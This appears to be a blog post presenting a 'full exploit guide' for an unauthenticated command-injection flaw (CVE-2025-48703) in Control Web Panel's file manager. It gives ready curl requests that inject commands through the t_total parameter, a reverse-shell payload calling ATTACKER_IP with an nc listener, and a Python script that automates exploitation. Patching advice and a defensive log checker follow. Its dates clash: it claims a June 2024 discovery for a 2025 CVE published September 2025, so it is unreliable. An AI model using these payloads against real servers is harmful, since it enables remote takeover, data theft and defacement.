CVE-2025-48703 - Unauthenticated Remote Code Execution in CWP (Control Web Panel) File Manager – Full Exploit Guide
---
Published: June 2024
Vulnerable Software: CWP (Control Web Panel, formerly CentOS Web Panel) < .9.8.1205
Vulnerability Type: Remote Code Execution (RCE)
Attack Complexity: Low
Authentication Required: No (But a valid non-root username must be known)
Introduction
If you administer web servers, you have probably heard of CWP (Control Web Panel), one of the most popular free Linux hosting panels. In June 2024, a critical vulnerability was found and patched. Tracked as CVE-2025-48703, this bug allows unauthenticated remote code execution (RCE) with a single crafted HTTP request. An attacker only needs to know a valid (non-root) username on your server, a low bar given how common usernames like admin or user are.
Vulnerability Details
File/Endpoint:
/cwp_XXXX/filemanager2/ajax_calls.php
(where XXXX is a random number assigned per install)
Vulnerable parameter:
t_total in a POST request to change file permissions
Root Cause:
The backend did not sanitize the t_total POST parameter before passing it to a shell command. Shell metacharacters such as ;, && and | are therefore interpreted by the shell, allowing arbitrary command injection.
Reference:
- Official Changelog, .9.8.1205
- PacketStorm CVE link (placeholder, to be updated)
- NVD – CVE-2025-48703 (placeholder)
1. Identify a valid non-root username. Public servers often have common hosting usernames.
2. Send a specially crafted POST request to the vulnerable endpoint, injecting command(s) with shell metacharacters in the t_total parameter.
Suppose the user is demo and the panel runs on panel.example.com:2083. To run id:
curl -k -X POST \
-d "user=demo&t_total=1;id;" \
"https://panel.example.com:2083/cwp_1234/filemanager2/ajax_calls.php?action=changePerm"
A more practical payload, for full shell access:
curl -k -X POST \
-d "user=demo&t_total=1;bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1';" \
"https://panel.example.com:2083/cwp_1234/filemanager2/ajax_calls.php?action=changePerm"
Replace ATTACKER_IP and 4444 with your attack box and desired port.
Don’t forget to start a listener!
nc -lvnp 4444
Here is a Python script to automate exploitation and fetch the command output:
import requests

# Panel base URL, target username, and the per-install cwp_XXXX prefix
panel = 'https://panel.example.com:2083'
user = 'demo'
path = '/cwp_1234/filemanager2/ajax_calls.php?action=changePerm'
cmd = 'whoami'

# t_total reaches a shell unsanitized, so ';' ends the intended command
# and runs ours
payload = f"1;{cmd};"
data = {
'user': user,
't_total': payload,
}
# verify=False because panels commonly run with self-signed certificates
r = requests.post(panel + path, data=data, verify=False)
print(r.text)
Run it with:
python3 cve-2025-48703.py
- No password needed: you only need to know or guess a username.
- Wide attack surface: If your panel is public, it’s a big target. Panels often leak valid usernames via logins, stats, or email addresses.
- Escalation: Once inside as demo, you might pivot, dump databases, deface sites, access email, etc.
Who’s At Risk?
- Any CWP/Control Web Panel install below .9.8.1205
Mitigation and Remediation
1. Update CWP!
- Update instructions: to patch, run the updater as root:
sh /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp
- Afterwards, make sure the version is >= .9.8.1205.
2. Restrict Panel Access:
Never leave panels open to the world if you can help it.
3. Rotate and Hide Usernames:
4. Check Your Logs:
Look for requests to
/cwp_XXXX/filemanager2/ajax_calls.php?action=changePerm
with suspicious values in t_total (semicolons, pipes, unusually long values, etc.).
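A small checker for that log review, added here as an example and not part of the original post or of CWP itself. It assumes a TSV export (client, method, target, raw POST body) from a body-logging reverse proxy or WAF, because t_total travels in the POST body and a plain access log never records it; it flags changePerm requests whose t_total is anything other than an octal permission mode and says why.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus, urlsplit

# Vulnerable endpoint from the advisory; the cwp_XXXX prefix is random per install.
ENDPOINT_RE = re.compile(r"^/cwp_\d+/filemanager2/ajax_calls\.php$")
# A legitimate permission change carries three or four octal digits, e.g. 644 or 0755.
VALID_MODE_RE = re.compile(r"^[0-7]{3,4}$")
SHELL_META = set(";|&`$()<>\n")

def parse_form(encoded: str) -> dict:
    """Decode form data splitting only on '&', so a ';' in a value survives for inspection."""
    pairs = (pair.partition("=") for pair in encoded.split("&"))
    return {unquote_plus(k): unquote_plus(v) for k, _, v in pairs}

def t_total_reason(value: str) -> Optional[str]:
    """Return why a t_total value is suspicious, or None if it is a plain octal mode."""
    if VALID_MODE_RE.match(value):
        return None
    if any(c in SHELL_META for c in value):
        return "shell metacharacters in t_total"
    return "non-octal t_total value"

def check_request(method: str, target: str, body: str) -> Optional[str]:
    """Flag a POST to filemanager2/ajax_calls.php?action=changePerm whose t_total is not a mode."""
    url = urlsplit(target)
    if method != "POST" or not ENDPOINT_RE.match(url.path):
        return None
    if parse_form(url.query).get("action") != "changePerm":
        return None
    value = parse_form(body).get("t_total")
    return None if value is None else t_total_reason(value)

def scan_log(log_text: str) -> list:
    """Return (client_ip, reason, t_total) for each suspicious record of a TSV log."""
    hits = []
    for line in log_text.splitlines():
        ip, method, target, body = line.split("\t", 3)
        reason = check_request(method, target, body)
        if reason:
            hits.append((ip, reason, parse_form(body)["t_total"]))
    return hits

# Constructed records (client, method, target, raw POST body) as a body-logging proxy would keep them.
SAMPLE_LOG = """\
203.0.113.5\tPOST\t/cwp_1234/filemanager2/ajax_calls.php?action=changePerm\tuser=demo&t_total=755
203.0.113.6\tPOST\t/cwp_1234/filemanager2/ajax_calls.php?action=changePerm\tuser=demo&t_total=1;id;
203.0.113.7\tGET\t/cwp_1234/filemanager2/ajax_calls.php?action=list\t
203.0.113.8\tPOST\t/cwp_1234/filemanager2/ajax_calls.php?action=changePerm\tuser=demo&t_total=1||whoami"""
```

Feed it your own export in the same column order; anything it returns is a changePerm call that no file manager UI would send and deserves a look at the source address and the account named in the user field.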
References
- Official CWP Changelog
- Exploit DB entry for CVE-2025-48703 (will be updated)
- NVD CVE-2025-48703
Summary
CVE-2025-48703 is a critical unauthenticated remote code execution bug in Control Web Panel. Patching and restricting access are strongly recommended.
If you run CWP, update now—and check your logs for exploitation attempts!
Stay safe and patch fast.
*(This post is exclusive research, written in plain language for sysadmins and security pros. Use the provided exploit solely for ethical, educational, and defense testing.)*
Timeline
Published on: 09/19/2025 18:15:36 UTC
Last modified on: 11/05/2025 14:07:33 UTC